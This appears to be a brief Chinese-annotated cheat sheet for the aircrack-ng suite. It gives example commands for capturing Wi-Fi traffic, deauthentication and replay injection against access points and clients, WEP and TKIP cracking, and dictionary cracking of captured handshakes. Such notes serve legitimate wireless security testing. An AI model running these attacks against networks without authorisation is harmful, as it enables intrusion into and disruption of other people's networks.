Aircrack-ng
1.airdecap-ng #一般用于加密报文的解密
参数:
-l #不移除802.11部分
-e #essid
-p #password
e.g.
airdecap-ng -l -e xxx -p passwd hack-01.cap #wpa wpa2
airdecap-ng -w wep_passwd hack01.cap/hack01.ivs #wep
附1:ivstools #合并ivs文件或转换cap为ivs
ivstools --merge 1.ivs 2.ivs 3.ivs xx.ivs
ivstools --convert hack.cap hack.ivs
2.airdriver-ng #查询aircrack-ng所支持的芯片
airdriver-ng supported #列出所有支持芯片名称
airdriver-ng installed #列出已安装的驱动
3.airdecloack-ng #过滤无线报文
e.g.
airdecloack-ng --bssid xxx --filters signal -i hack01-cap
4.wesside-ng #wep破解工具
e.g.
wesside-ng -i mon0 -v xxx(Victim BSSID)
5.tkiptun-ng #tkip加密包的破解工具
e.g.
tkiptun-ng -a AP_MAC -h 客户端mac mon0
6.airodump-ng #探测网络,抓取数据包
e.g.
airodump-ng mon0
airodump-ng -c 信道 -w --ivs hack mon0
7.aireplay-ng #注入攻击
e.g.
aireplay-ng -0 10 -a ap_mac -c 客户端mac mon0
aireplay-ng -3 -b ap_mac -h 客户端mac mon0
8.airmon-ng #激活网卡至监听模式或释放监听模式的网卡
e.g.
airmon-ng wlan0 start
airmon-ng mon0 stop
9.aircrack-ng #破解抓到的包
e.g.
aircrack-ng hack-01.cap -w xxx.dic